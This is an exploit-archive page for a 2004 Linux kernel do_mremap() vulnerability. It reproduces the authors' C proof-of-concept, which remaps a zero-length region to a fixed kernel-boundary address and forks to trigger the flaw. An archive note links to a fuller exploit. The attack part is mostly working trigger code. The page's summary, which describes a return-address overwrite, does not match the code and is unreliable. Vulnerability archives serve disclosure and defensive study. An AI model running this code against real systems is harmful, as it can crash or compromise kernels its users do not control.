header-logo
Suggest Exploit
vendor:
N/A
by:
Christophe Devine and Julien Tinnes
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2004

Proof-of-concept exploit code for do_mremap()

This proof-of-concept exploit code for do_mremap() is a buffer overflow vulnerability that allows an attacker to execute arbitrary code on the target system. The exploit code uses the real_mremap() system call to map a memory region to a fixed address, which can be used to overwrite the return address of a function and execute arbitrary code. The exploit was released in 2004 by Christophe Devine and Julien Tinnes.

Mitigation:

The best way to mitigate this vulnerability is to apply the latest security patches and updates to the system.
Source

Exploit-DB raw data:

/*
 *  EDB Note: This will just "test" the vulnerability. 
*   EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

// milw0rm.com [2004-01-06]

Navigation

Suggest Exploit

Services By CQR